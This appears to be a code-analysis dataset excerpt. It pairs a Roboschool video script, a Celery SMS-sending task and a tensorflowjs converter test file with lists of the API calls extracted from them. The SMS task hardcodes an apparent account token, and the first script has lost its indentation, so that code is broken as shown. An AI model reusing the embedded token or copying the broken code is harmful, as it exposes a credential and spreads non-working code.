import gym, roboschool
env = gym.make("RoboschoolHopper-v1")
env.unwrapped.model_xml = 'mujoco_assets/hopper_test.xml'
env.reset()
#env.render()
import os
from scipy.misc import imsave
import subprocess as sp
outdir = 'xml_vid'
os.makedirs(outdir, exist_ok=True)
i = 0
for _ in range(10):
env.reset()
for _ in range(100):
env.step(env.action_space.sample())
rgb = env.render('rgb_array')
imsave(os.path.join(outdir, '{:05d}.png'.format(i)), rgb)
i+=1
sp.call(['ffmpeg', '-r', '60', '-f', 'image2', '-i', os.path.join(outdir, '%05d.png'), '-vcodec', 'libx264', '-pix_fmt', 'yuv420p', os.path.join(outdir, 'out.mp4')])
env.close()
| [
"xml.etree.ElementTree.parse",
"os.makedirs",
"os.path.join",
"numpy.sum",
"numpy.array",
"numpy.concatenate",
"gym.make"
] | [((9394, 9425), 'gym.make', 'gym.make', (['"""RoboschoolHopper-v1"""'], {}), "('RoboschoolHopper-v1')\n", (9402, 9425), False, 'import gym, roboschool\n'), ((9625, 9659), 'os.makedirs', 'os.makedirs', (['outdir'], {'exist_ok': '(True)'}), '(outdir, exist_ok=True)\n', (9636, 9659), False, 'import os\n'), ((1671, 1691), 'numpy.array', 'np.array', (['fromto[:3]'], {}), '(fromto[:3])\n', (1679, 1691), True, 'import numpy as np\n'), ((1710, 1730), 'numpy.array', 'np.array', (['fromto[3:]'], {}), '(fromto[3:])\n', (1718, 1730), True, 'import numpy as np\n'), ((7208, 7232), 'xml.etree.ElementTree.parse', 'ET.parse', (['self.model_xml'], {}), '(self.model_xml)\n', (7216, 7232), True, 'import xml.etree.ElementTree as ET\n'), ((1756, 1788), 'numpy.sum', 'np.sum', (['((self.p2 - self.p1) ** 2)'], {}), '((self.p2 - self.p1) ** 2)\n', (1762, 1788), True, 'import numpy as np\n'), ((9977, 10009), 'os.path.join', 'os.path.join', (['outdir', '"""%05d.png"""'], {}), "(outdir, '%05d.png')\n", (9989, 10009), False, 'import os\n'), ((10056, 10087), 'os.path.join', 'os.path.join', (['outdir', '"""out.mp4"""'], {}), "(outdir, 'out.mp4')\n", (10068, 10087), False, 'import os\n'), ((6973, 6991), 'numpy.array', 'np.array', (['(v1, v2)'], {}), '((v1, v2))\n', (6981, 6991), True, 'import numpy as np\n'), ((2228, 2262), 'numpy.concatenate', 'np.concatenate', (['[self.p1, self.p2]'], {}), '([self.p1, self.p2])\n', (2242, 2262), True, 'import numpy as np\n')] |
from ronglian_sms_sdk import SmsSDK
from celery_tasks.main import app
# 写我们的任务(函数)
# 任务必须要celery的实例对象装饰器task装饰
# 任务包的任务需要celery调用自检检查函数。(在main里面写。)
@app.task
def celery_send_sms_code(mobile, sms_code):
accId = '<KEY>'
accToken = '514a8783b8c2481ebbeb6a814434796f'
appId = '<KEY>'
# 9.1. 创建荣联云 实例对象
sdk = SmsSDK(accId, accToken, appId)
tid = '1' # 我们发送短信的模板,值 只能是 1 因为我们是测试用户
mobile = '%s' % mobile # '手机号1,手机号2' 给哪些手机号发送验证码,只能是测试手机号
datas = (sms_code, 10) # ('变量1', '变量2') 涉及到模板的变量
# 您的验证码为{1},请于{2} 分钟内输入
# 您的验证码为666999,请于5 分钟内输入
# 9.2. 发送短信
sdk.sendMessage(tid, mobile, datas) | [
"ronglian_sms_sdk.SmsSDK"
] | [((326, 356), 'ronglian_sms_sdk.SmsSDK', 'SmsSDK', (['accId', 'accToken', 'appId'], {}), '(accId, accToken, appId)\n', (332, 356), False, 'from ronglian_sms_sdk import SmsSDK\n')] |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test the Python API and shell binary of the tensorflowjs pip package."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import json
import os
import shutil
import subprocess
import sys
import tempfile
import unittest
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import variables
from tensorflow.python.training.tracking import tracking
from tensorflow.python.saved_model.save import save
import tensorflow_hub as hub
import tensorflowjs as tfjs
def _createKerasModel(layer_name_prefix, h5_path=None):
"""Create a Keras model for testing.
Args:
layer_name_prefix: A prefix string for layer names. This helps avoid
clashes in layer names between different test methods.
h5_path: Optional string path for a HDF5 (.h5) file to save the model
in.
Returns:
An instance of keras.Model.
"""
input_tensor = keras.layers.Input((3, ))
dense1 = keras.layers.Dense(
4,
use_bias=True,
kernel_initializer='ones',
bias_initializer='zeros',
name=layer_name_prefix + '1')(input_tensor)
output = keras.layers.Dense(
2,
use_bias=False,
kernel_initializer='ones',
name=layer_name_prefix + '2')(dense1)
model = keras.models.Model(inputs=[input_tensor], outputs=[output])
if h5_path:
model.save(h5_path)
return model
def _createTensorFlowSavedModelV1(name_scope, save_path):
"""Create a TensorFlow SavedModel for testing.
Args:
name_scope: Name scope to create the model under. This helps avoid
op and variable name clashes between different test methods.
save_path: The directory path in which to save the model.
"""
graph = tf.Graph()
with graph.as_default():
with tf.compat.v1.name_scope(name_scope):
x = tf.compat.v1.constant([[37.0, -23.0], [1.0, 4.0]])
w = tf.compat.v1.get_variable('w', shape=[2, 2])
y = tf.compat.v1.matmul(x, w)
output = tf.compat.v1.nn.softmax(y)
init_op = w.initializer
# Create a builder.
builder = tf.compat.v1.saved_model.builder.SavedModelBuilder(save_path)
with tf.compat.v1.Session() as sess:
# Run the initializer on `w`.
sess.run(init_op)
builder.add_meta_graph_and_variables(
sess, [tf.compat.v1.saved_model.tag_constants.SERVING],
signature_def_map={
"serving_default":
tf.compat.v1.saved_model.signature_def_utils.predict_signature_def(
inputs={"x": x},
outputs={"output": output})
},
assets_collection=None)
builder.save()
def _createTensorFlowSavedModel(name_scope, save_path):
"""Create a TensorFlow SavedModel for testing.
Args:
name_scope: Name scope to create the model under. This helps avoid
op and variable name clashes between different test methods.
save_path: The directory path in which to save the model.
"""
input_data = constant_op.constant(1., shape=[1])
root = tracking.AutoTrackable()
root.v1 = variables.Variable(3.)
root.v2 = variables.Variable(2.)
root.f = def_function.function(lambda x: root.v1 * root.v2 * x)
to_save = root.f.get_concrete_function(input_data)
save(root, save_path, to_save)
def _create_hub_module(save_path):
"""Create a TensorFlow Hub module for testing.
Args:
save_path: The directory path in which to save the model.
"""
# Module function that doubles its input.
def double_module_fn():
w = tf.Variable([2.0, 4.0])
x = tf.compat.v1.placeholder(dtype=tf.float32)
hub.add_signature(inputs=x, outputs=x*w)
graph = tf.Graph()
with graph.as_default():
spec = hub.create_module_spec(double_module_fn)
m = hub.Module(spec)
# Export the module.
with tf.compat.v1.Session(graph=graph) as sess:
sess.run(tf.compat.v1.global_variables_initializer())
m.export(save_path, sess)
class APIAndShellTest(tf.test.TestCase):
"""Tests for the Python API of the pip package."""
@classmethod
def setUpClass(cls):
cls.class_tmp_dir = tempfile.mkdtemp()
cls.tf_saved_model_dir = os.path.join(cls.class_tmp_dir, 'tf_saved_model')
cls.tf_saved_model_v1_dir = os.path.join(
cls.class_tmp_dir, 'tf_saved_model_v1')
_createTensorFlowSavedModel('a', cls.tf_saved_model_dir)
_createTensorFlowSavedModelV1('b', cls.tf_saved_model_v1_dir)
cls.tf_hub_module_dir = os.path.join(cls.class_tmp_dir, 'tf_hub_module')
_create_hub_module(cls.tf_hub_module_dir)
@classmethod
def tearDownClass(cls):
shutil.rmtree(cls.class_tmp_dir)
def setUp(self):
# Make sure this file is not being run from the source directory, to
# avoid picking up source files.
if os.path.isdir(
os.path.join(os.path.dirname(__file__), 'tensorflowjs')):
self.fail('Do not run this test from the Python source directory. '
'This file is intended to be run on pip install.')
self._tmp_dir = tempfile.mkdtemp()
super(APIAndShellTest, self).setUp()
def tearDown(self):
if os.path.isdir(self._tmp_dir):
shutil.rmtree(self._tmp_dir)
super(APIAndShellTest, self).tearDown()
def testVersionString(self):
self.assertEqual(2, tfjs.__version__.count('.'))
def testSaveKerasModel(self):
with self.test_session():
# First create a toy keras model.
model = _createKerasModel('MergedDense')
tfjs.converters.save_keras_model(model, self._tmp_dir)
# Briefly check the model topology.
with open(os.path.join(self._tmp_dir, 'model.json')) as f:
json_content = json.load(f)
model_json = json_content['modelTopology']
self.assertIsInstance(model_json['model_config'], dict)
self.assertIsInstance(model_json['model_config']['config'], dict)
self.assertIn('layers', model_json['model_config']['config'])
weights_manifest = json_content['weightsManifest']
self.assertIsInstance(weights_manifest, list)
# Briefly check the weights manifest.
weight_shapes = dict()
weight_dtypes = dict()
for manifest_item in weights_manifest:
for weight in manifest_item['weights']:
weight_name = weight['name']
weight_shapes[weight_name] = weight['shape']
weight_dtypes[weight_name] = weight['dtype']
self.assertEqual(
sorted(list(weight_shapes.keys())),
sorted([
'MergedDense1/kernel', 'MergedDense1/bias',
'MergedDense2/kernel'
]))
self.assertEqual(weight_shapes['MergedDense1/kernel'], [3, 4])
self.assertEqual(weight_shapes['MergedDense1/bias'], [4])
self.assertEqual(weight_shapes['MergedDense2/kernel'], [4, 2])
self.assertEqual(weight_dtypes['MergedDense1/kernel'], 'float32')
self.assertEqual(weight_dtypes['MergedDense1/bias'], 'float32')
self.assertEqual(weight_dtypes['MergedDense2/kernel'], 'float32')
def testLoadKerasModel(self):
# Use separate tf.Graph and tf.compat.v1.Session contexts to prevent name collision.
with tf.Graph().as_default(), tf.compat.v1.Session():
# First create a toy keras model.
model1 = _createKerasModel('MergedDense')
tfjs.converters.save_keras_model(model1, self._tmp_dir)
model1_weight_values = model1.get_weights()
with tf.Graph().as_default(), tf.compat.v1.Session():
# Load the model from saved artifacts.
model2 = tfjs.converters.load_keras_model(
os.path.join(self._tmp_dir, 'model.json'))
# Compare the loaded model with the original one.
model2_weight_values = model2.get_weights()
self.assertEqual(len(model1_weight_values), len(model2_weight_values))
for model1_weight_value, model2_weight_value in zip(
model1_weight_values, model2_weight_values):
self.assertAllClose(model1_weight_value, model2_weight_value)
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(self._tmp_dir, 'group*-*')))
def testInvalidInputFormatRaisesError(self):
process = subprocess.Popen(
[
'tensorflowjs_converter', '--input_format',
'nonsensical_format', self._tmp_dir, self._tmp_dir
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertGreater(process.returncode, 0)
self.assertIn(b'--input_format', tf.compat.as_bytes(stderr))
def testMissingInputPathRaisesError(self):
process = subprocess.Popen(
[
'tensorflowjs_converter'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertGreater(process.returncode, 0)
self.assertIn(b'input_path', tf.compat.as_bytes(stderr))
def testKerasH5ConversionWorksFromCLI(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
# First create a toy keras model.
os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
_createKerasModel('MergedDenseForCLI', h5_path)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras', h5_path,
self._tmp_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# Briefly check the model topology.
with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f:
json_content = json.load(f)
model_json = json_content['modelTopology']
self.assertIsInstance(model_json['model_config'], dict)
self.assertIsInstance(model_json['model_config']['config'], dict)
self.assertIn('layers', model_json['model_config']['config'])
weights_manifest = json_content['weightsManifest']
self.assertIsInstance(weights_manifest, list)
# Briefly check the weights manifest.
weight_shapes = dict()
weight_dtypes = dict()
for manifest_item in weights_manifest:
for weight in manifest_item['weights']:
weight_name = weight['name']
weight_shapes[weight_name] = weight['shape']
weight_dtypes[weight_name] = weight['dtype']
self.assertEqual(
sorted(list(weight_shapes.keys())),
sorted([
'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias',
'MergedDenseForCLI2/kernel'
]))
self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4])
self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4])
self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2])
self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32')
self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32')
self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32')
# Verify that there is only one weight group due to the default
# non-split_weights_by_layer behavior. The model is a small one, which
# does not exceed the 4-MB shard size limit. Therefore, there should
# be only one weight file.
self.assertEqual(
1, len(glob.glob(os.path.join(self._tmp_dir, 'group*'))))
def testKerasH5ConversionSplitWeightsByLayerWorksFromCLI(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
# First create a toy keras model.
os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
_createKerasModel('MergedDenseForCLI', h5_path)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras',
'--split_weights_by_layer', h5_path, self._tmp_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# Briefly check the model topology.
with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f:
json_content = json.load(f)
model_json = json_content['modelTopology']
self.assertIsInstance(model_json['model_config'], dict)
self.assertIsInstance(model_json['model_config']['config'], dict)
self.assertIn('layers', model_json['model_config']['config'])
weights_manifest = json_content['weightsManifest']
self.assertIsInstance(weights_manifest, list)
# Briefly check the weights manifest.
weight_shapes = dict()
weight_dtypes = dict()
for manifest_item in weights_manifest:
for weight in manifest_item['weights']:
weight_name = weight['name']
weight_shapes[weight_name] = weight['shape']
weight_dtypes[weight_name] = weight['dtype']
self.assertEqual(
sorted(list(weight_shapes.keys())),
sorted([
'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias',
'MergedDenseForCLI2/kernel'
]))
self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4])
self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4])
self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2])
self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32')
self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32')
self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32')
# Verify that there are two weight groups due to the optional flag
# --split_weights_by_layer behavior. The model is a small one. None of
# the layers should have weight sizes exceeding the 4-MB shard size
# limit.
self.assertEqual(
2, len(glob.glob(os.path.join(self._tmp_dir, 'group*'))))
def testKerasH5ConversionWithSignatureNameErrors(self):
process = subprocess.Popen(
[
'tensorflowjs_converter', '--input_format', 'keras',
'--signature_name', 'bar',
os.path.join(self._tmp_dir, 'foo.h5'),
os.path.join(self._tmp_dir, 'output')
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertGreater(process.returncode, 0)
self.assertIn(
b'The --signature_name flag is applicable only to',
tf.compat.as_bytes(stderr))
def testConvertTFSavedModelV1WithCommandLineWorks(self):
output_dir = os.path.join(self._tmp_dir)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tf_saved_model',
'--output_format', 'tfjs_graph_model',
self.tf_saved_model_v1_dir, output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
weights = [{
'paths': ['group1-shard1of1.bin'],
'weights': [{'dtype': 'float32', 'name': 'w', 'shape': [2, 2]}]}]
# Load the saved weights as a JSON string.
output_json = json.load(
open(os.path.join(output_dir, 'model.json'), 'rt'))
self.assertEqual(output_json['weightsManifest'], weights)
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def testConvertTFHubModuleWithCommandLineWorks(self):
output_dir = os.path.join(self._tmp_dir)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tf_hub',
self.tf_hub_module_dir, output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
weights = [{
'paths': ['group1-shard1of1.bin'],
'weights': [{
'shape': [2],
'name': 'module/Variable',
'dtype': 'float32'
}]
}]
# Load the saved weights as a JSON string.
output_json = json.load(
open(os.path.join(output_dir, 'model.json'), 'rt'))
self.assertEqual(output_json['weightsManifest'], weights)
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def testConvertTFSavedModelWithCommandLineWorks(self):
output_dir = os.path.join(self._tmp_dir)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tf_saved_model',
'--output_format', 'tfjs_graph_model',
self.tf_saved_model_dir, output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
weights = [{
'paths': ['group1-shard1of1.bin'],
'weights': [{
'dtype': 'float32',
'shape': [],
'name': 'StatefulPartitionedCall/mul'
}]
}]
# Load the saved weights as a JSON string.
output_json = json.load(
open(os.path.join(output_dir, 'model.json'), 'rt'))
weights_manifest = output_json['weightsManifest']
self.assertEqual(len(weights_manifest), len(weights))
if sys.version_info[0] < 3:
self.assertItemsEqual(weights_manifest[0]['paths'],
weights[0]['paths'])
self.assertItemsEqual(weights_manifest[0]['weights'],
weights[0]['weights'])
else:
self.assertCountEqual(weights_manifest[0]['paths'],
weights[0]['paths'])
self.assertCountEqual(weights_manifest[0]['weights'],
weights[0]['weights'])
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def testConvertTFHubModuleWithCommandLineWorks(self):
output_dir = os.path.join(self._tmp_dir)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tf_hub',
self.tf_hub_module_dir, output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
weights = [{
'paths': ['group1-shard1of1.bin'],
'weights': [{
'shape': [2],
'name': 'module/Variable',
'dtype': 'float32'
}]
}]
# Load the saved weights as a JSON string.
output_json = json.load(
open(os.path.join(output_dir, 'model.json'), 'rt'))
self.assertEqual(output_json['weightsManifest'], weights)
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def testConvertTensorflowjsArtifactsToKerasH5(self):
# 1. Create a toy keras model and save it as an HDF5 file.
os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
with tf.Graph().as_default(), tf.compat.v1.Session():
model = _createKerasModel('MergedDenseForCLI', h5_path)
model_json = model.to_json()
# 2. Convert the HDF5 file to tensorflowjs format.
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras', h5_path,
self._tmp_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Convert the tensorflowjs artifacts back to HDF5.
new_h5_path = os.path.join(self._tmp_dir, 'model_2.h5')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'keras',
os.path.join(self._tmp_dir, 'model.json'), new_h5_path])
process.communicate()
self.assertEqual(0, process.returncode)
# 4. Load the model back from the new HDF5 file and compare with the
# original model.
with tf.Graph().as_default(), tf.compat.v1.Session():
model_2 = keras.models.load_model(new_h5_path)
model_2_json = model_2.to_json()
self.assertEqual(model_json, model_2_json)
def testLoadTensorflowjsArtifactsAsKerasModel(self):
# 1. Create a toy keras model and save it as an HDF5 file.
os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
with tf.Graph().as_default(), tf.compat.v1.Session():
model = _createKerasModel('MergedDenseForCLI', h5_path)
model_json = model.to_json()
# 2. Convert the HDF5 file to tensorflowjs format.
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras', h5_path,
self._tmp_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Load the tensorflowjs artifacts as a keras.Model instance.
with tf.Graph().as_default(), tf.compat.v1.Session():
model_2 = tfjs.converters.load_keras_model(
os.path.join(self._tmp_dir, 'model.json'))
model_2_json = model_2.to_json()
self.assertEqual(model_json, model_2_json)
def testVersion(self):
process = subprocess.Popen(
['tensorflowjs_converter', '--version'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, _ = process.communicate()
self.assertEqual(0, process.returncode)
self.assertIn(
tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__),
tf.compat.as_bytes(stdout))
process = subprocess.Popen(
['tensorflowjs_converter', '-v'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, _ = process.communicate()
self.assertEqual(0, process.returncode)
self.assertIn(
tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__),
tf.compat.as_bytes(stdout))
class ConvertTfKerasSavedModelTest(tf.test.TestCase):
def setUp(self):
super(ConvertTfKerasSavedModelTest, self).setUp()
self._tmp_dir = tempfile.mkdtemp()
def tearDown(self):
if os.path.isdir(self._tmp_dir):
shutil.rmtree(self._tmp_dir)
super(ConvertTfKerasSavedModelTest, self).tearDown()
def _createSimpleSequentialModel(self):
model = keras.Sequential()
model.add(keras.layers.Reshape([2, 3], input_shape=[6]))
model.add(keras.layers.LSTM(10))
model.add(keras.layers.Dense(1, activation='sigmoid'))
return model
def _createNestedSequentialModel(self):
model = keras.Sequential()
model.add(keras.layers.Dense(6, input_shape=[10], activation='relu'))
model.add(self._createSimpleSequentialModel())
return model
def _createFunctionalModelWithWeights(self):
input1 = keras.Input(shape=[8])
input2 = keras.Input(shape=[10])
y = keras.layers.Concatenate()([input1, input2])
y = keras.layers.Dense(4, activation='softmax')(y)
model = keras.Model([input1, input2], y)
return model
def testConvertTfKerasNestedSequentialSavedModelIntoTfjsFormat(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x = np.random.randn(8, 10)
# 1. Run the model.predict(), store the result. Then saved the model
# as a SavedModel.
model = self._createNestedSequentialModel()
y = model.predict(x)
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Implicit value of --output_format: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras_saved_model',
self._tmp_dir, tfjs_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
model_json_path = os.path.join(tfjs_output_dir, 'model.json')
self.assertTrue(os.path.isfile(model_json_path))
# 3. Convert the tfjs model to keras h5 format.
new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'keras', model_json_path, new_h5_path])
process.communicate()
self.assertEqual(0, process.returncode)
self.assertTrue(os.path.isfile(new_h5_path))
# 4. Load the model back and assert on the equality of the predict
# results.
model_prime = keras.models.load_model(new_h5_path)
new_y = model_prime.predict(x)
self.assertAllClose(y, new_y)
def testConvertTfKerasFunctionalSavedModelIntoTfjsFormat(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x1 = np.random.randn(4, 8)
x2 = np.random.randn(4, 10)
# 1. Run the model.predict(), store the result. Then saved the model
# as a SavedModel.
model = self._createFunctionalModelWithWeights()
y = model.predict([x1, x2])
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Use explicit --output_format value: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras_saved_model',
'--output_format', 'tfjs_layers_model',
self._tmp_dir, tfjs_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
model_json_path = os.path.join(tfjs_output_dir, 'model.json')
self.assertTrue(os.path.isfile(model_json_path))
# 3. Convert the tfjs model to keras h5 format.
new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'keras', model_json_path, new_h5_path])
process.communicate()
self.assertEqual(0, process.returncode)
self.assertTrue(os.path.isfile(new_h5_path))
# 4. Load the model back and assert on the equality of the predict
# results.
model_prime = keras.models.load_model(new_h5_path)
new_y = model_prime.predict([x1, x2])
self.assertAllClose(y, new_y)
def testUsingIncorrectKerasSavedModelRaisesError(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x = np.random.randn(8, 10)
# 1. Run the model.predict(), store the result. Then saved the model
# as a SavedModel.
model = self._createNestedSequentialModel()
y = model.predict(x)
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Use incorrect --input_format value: keras
process = subprocess.Popen(
[
'tensorflowjs_converter', '--input_format', 'keras',
self._tmp_dir, tfjs_output_dir
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertIn(
b'Expected path to point to an HDF5 file, '
b'but it points to a directory', tf.compat.as_bytes(stderr))
def testConvertTfjsLayersModelIntoShardedWeights(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x = np.random.randn(8, 10)
# 1. Run the model.predict(), store the result. Then saved the model
# as a SavedModel.
model = self._createNestedSequentialModel()
y = model.predict(x)
weights = model.get_weights()
total_weight_bytes = sum(np.size(w) for w in weights) * 4
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs_layers_model format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Implicit value of --output_format: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras_saved_model',
self._tmp_dir, tfjs_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Convert the tfjs_layers_model to another tfjs_layers_model,
# with sharded weights.
weight_shard_size_bytes = int(total_weight_bytes * 0.3)
# Due to the shard size, there ought to be 4 shards after conversion.
sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'tfjs_layers_model',
'--weight_shard_size_bytes', str(weight_shard_size_bytes),
os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 4. Check the sharded weight files and their sizes.
weight_files = sorted(
glob.glob(os.path.join(sharded_model_dir, 'group*.bin')))
self.assertEqual(len(weight_files), 4)
weight_file_sizes = [os.path.getsize(f) for f in weight_files]
self.assertEqual(sum(weight_file_sizes), total_weight_bytes)
self.assertEqual(weight_file_sizes[0], weight_file_sizes[1])
self.assertEqual(weight_file_sizes[0], weight_file_sizes[2])
self.assertLess(weight_file_sizes[3], weight_file_sizes[0])
# 5. Convert the sharded tfjs_layers_model back into a keras h5 file.
new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
os.path.join(sharded_model_dir, 'model.json'), new_h5_path
])
process.communicate()
self.assertEqual(0, process.returncode)
with tf.Graph().as_default(), tf.compat.v1.Session():
# 6. Load the keras model and check the predict() output is close to
# before.
new_model = keras.models.load_model(new_h5_path)
new_y = new_model.predict(x)
self.assertAllClose(new_y, y)
def testConvertTfjsLayersModelWithQuantization(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x = np.random.randn(8, 10)
# 1. Run the model.predict(), store the result. Then saved the model
# as a SavedModel.
model = self._createNestedSequentialModel()
y = model.predict(x)
weights = model.get_weights()
total_weight_bytes = sum(np.size(w) for w in weights) * 4
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs_layers_model format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Implicit value of --output_format: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras_saved_model',
self._tmp_dir, tfjs_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Convert the tfjs_layers_model to another tfjs_layers_model,
# with uint16 quantization.
weight_shard_size_bytes = int(total_weight_bytes * 0.3)
# Due to the shard size, there ought to be 4 shards after conversion.
sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'tfjs_layers_model',
'--quantization_bytes', '2',
os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 4. Check the quantized weight file and its size.
weight_files = sorted(
glob.glob(os.path.join(sharded_model_dir, 'group*.bin')))
self.assertEqual(len(weight_files), 1)
weight_file_size = os.path.getsize(weight_files[0])
# The size of the weight file should reflect the uint16 quantization.
self.assertEqual(weight_file_size, total_weight_bytes // 2)
def testConvertTfjsLayersModelToTfjsGraphModel(self):
x = np.random.randn(8, 10)
# 1. Create a model for testing.
model = keras.Sequential()
model.add(keras.layers.Dense(10, activation='relu', input_shape=[4]))
model.add(keras.layers.Dense(1, activation='sigmoid'))
h5_path = os.path.join(self._tmp_dir, 'model.h5')
model.save(h5_path)
# 2. Convert the keras saved model to tfjs_layers_model format.
layers_model_output_dir = os.path.join(self._tmp_dir, 'tfjs_layers')
# Implicit value of --output_format: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras',
h5_path, layers_model_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Convert the tfjs_layers_model to another tfjs_graph_model.
graph_model_dir = os.path.join(self._tmp_dir, 'tfjs_graph')
process = subprocess.Popen([
